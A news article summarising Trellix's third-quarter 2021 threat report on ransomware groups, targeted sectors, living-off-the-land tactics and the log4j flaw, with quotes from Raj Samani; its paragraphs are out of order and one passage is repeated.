Trellix: 3 Sectors Most Heavily Hit with Ransomware Activity
This year will be every bit as busy as last year when it comes to cyberattacks.
![ransomware detected ransomware detected](https://eu-images.contentstack.com/v3/assets/blt10e444bce2d36aa8/blt9b482edb54714e76/65241cfc1be3f571df2a537e/Ransomware-Detected.jpg?width=700&auto=webp&quality=80&disable=upscale)
Shutterstock
Trellix saw the resurgence of the DarkSide ransomware group known as BlackMatter, despite that group’s claim to have stopped operating, Raj Samani said.
“In using many of the same modus operandi that DarkSide used in the Colonial Pipeline attack, BlackMatter continued to leverage the double extortion approach, threatening to reveal data of victims unless a ransom is paid,” he said. “Notably we are also seeing new groups pop up — maybe not new groups, but certainly new variants. Most recently we have been tracking BlackCat, which is a capable threat group leveraging triple extortion tactics. These groups are finding new ways to extort more money from victims.”
REvil/Sodinokibi claimed responsibility for successfully infecting more than 1 million users through a ransomware attack on Kaseya VSA. REvil’s reported ransom demand of $70 million was the largest publicly known ransom amount to date. The results of the attack included the forced closing of hundreds of supermarket stores for several days.
LockBit 2.0 surfaced in July 2021 and eventually listed more than 200 victims on its data-leak site.
North America recorded the most incidents among continents, but saw a 12% decrease from the second quarter to the third quarter. The United States experienced the most reported incidents in the third quarter, but incidents decreased 9% from the second quarter.
France recorded the highest increase (400%) of incidents reported in the third quarter. In the meantime, Russia experienced the largest decrease (-79%) of third-quarter incidents compared to the second quarter.
The financial, utilities and retail sectors accounted for nearly 60% of ransomware detections. Health care followed at 17% and public sector at 15%. Notable sector increases from the second to the third quarter include finance/insurance (21%) and health care (7%).
“We have to consider this is based on what we are seeing, and there are likely many more unreported attacks happening,” Samani said. “However, across the board, it should come as no surprise attackers are making a lot of money through digital crime across all sectors.”
Malware was the technique used most often in reported incidents during the third quarter, but reported malware incidents decreased 24% compared to the second quarter.
Sector increases from the second to the third quarter include distributed denial of service (DDoS) attacks, up 112%, and targeted attacks, up 55%.
Cybercriminals are “living off the land” with techniques that use legitimate software and functions in a system to perform malicious actions on that system. Based on third-quarter events, Trellix has identified a trend in tools used by adversaries who are attempting to remain undetected. While state-sponsored threat groups and larger criminal threat groups have resources to develop tools in house, many turn to binaries and administratively installed software that may already be present on a target system to carry out distinct phases of an attack.
Adversaries may gather information on technologies used from job postings, customer testimonials advertised by vendors, or from an inside accomplice.
Samani said the upside of the report is “we are seeing these attacks, and are stopping them.”
“The report is as much of a state of the cybercrime ecosystem, but also is a reflection of what we are observing, blocking and analyzing,” he said.
In terms of cyber defense, there is a lot of information to decode, Samani said. However, fundamentally the first step is to understand the tactics of threat actors and implement measures to stop these approaches from being successful.
“For example if there is a concern about ransomware, consider the initial entry vectors and put in measures to ensure they are not vulnerable,” he said.
There’s no reason to think 2022 won’t be every bit as busy as 2021 when it comes to cyberattacks, Samani said.
“It will be a busy year,” he said. “This year we rolled out from log4j, straight into pseudo ransomware attacks,” he said. “If January is anything to go by, this year will bring many more critical events to address.”
In pseudo ransomware attacks, the attacks look like a ransomware attack and even provide a ransom note. However, the attack is malware designed to render targeted devices inoperable rather than to get a ransom.
There’s no reason to think 2022 won’t be every bit as busy as 2021 when it comes to cyberattacks, Samani said.
“It will be a busy year,” he said. “This year we rolled out from log4j, straight into pseudo ransomware attacks,” he said. “If January is anything to go by, this year will bring many more critical events to address.”
In pseudo ransomware attacks, the attacks look like a ransomware attack and even provide a ransom note. However, the attack is malware designed to render targeted devices inoperable rather than to get a ransom.
Cybercriminals are most heavily targeting the financial, utilities and retail sectors with ransomware activity, according to a new Trellix report.
This week, Trellix released its first major research report. The Advanced Threat Research Report examines the most noteworthy cybercriminal activity in the third quarter of 2021.
Last month, McAfee Enterprise and FireEye emerged as a new company under the name Trellix. The company focuses on extended detection and response (XDR).
In the third quarter, high-profile ransomware groups disappeared, reappeared, reinvented and even attempted to rebrand. They remained relevant and prevalent as a popular and potentially devastating threat against an increasing variety of sectors.
Ransomware activity was denounced and banned from numerous cybercriminal forums during the second quarter. However, Trellix observed activity among the same threat actors on several forums using alternate personas.
Raj Samani is chief scientist and fellow at Trellix.
Trellix’s Raj Samani
“Beyond the statistics, we covered some of the biggest risks facing organizations, and one of the biggest challenges was the log4j issue,” he said. “The impact and reliance this had was perhaps the most concerning for all of us.”
In December, researchers discovered a zero-day exploit in log4j, the the popular Java logging library. It results in remote code execution (RCE) by logging a certain string. Since then, additional vectors have been discovered.
Scroll through our slideshow above for more from Trellix’s report.
Want to contact the author directly about this story? Have ideas for a follow-up article? Email Edward Gately or connect with him on LinkedIn. |
About the Author(s)
You May Also Like